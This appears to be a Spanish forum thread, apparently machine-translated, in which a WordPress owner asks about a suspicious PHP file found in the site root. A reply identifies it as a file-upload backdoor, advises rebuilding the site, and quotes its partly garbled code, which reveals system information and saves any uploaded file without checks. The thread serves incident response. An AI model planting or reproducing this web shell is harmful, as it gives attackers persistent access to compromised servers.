Mientras recorría el directorio raíz de mi sitio, encontré este archivo RxR__kyfet.php. Este es un sitio de wordpress.
No sé php lo suficientemente bien como para decir exactamente lo que hace, pero parece bastante sospechoso. Revisé las copias de seguridad anteriores del sitio y ese archivo no estaba presente.
Lo eliminé, pero guardé una copia de seguridad por si acaso.
¿Puede alguien ayudarme a identificar lo que hace para referencia futura?
Parece ser una interfaz para cargar archivos en el sistema local. Si no cargó el archivo usted mismo, parece que su sistema está comprometido. Su apuesta más segura es reconstruir el sistema desde cero y aplicar los últimos parches de seguridad para wordpress & Cualquier plugin que uses.
Aquí está el código vinculado para la posteridad:
'. 'Tu nombre:' . php_uname (). '
'. $ cwd = getcwd ();
Echo '
';
if (! empty ($ _ FILES ['uploads'])) {
move_uploaded_file ($ _ FILES ['uploads'] ['tmp_name'], $ _FILES ['uploads'] ['name']);
Echo "alert ('upload Done'); Uploaded !!!
name:". $ _FILES ['uploads'] ['name']. "
tamaño:". $ _FILES ['uploads'] ['size']. "
tipo:". $ _FILES ['uploads'] ['type'];
}? >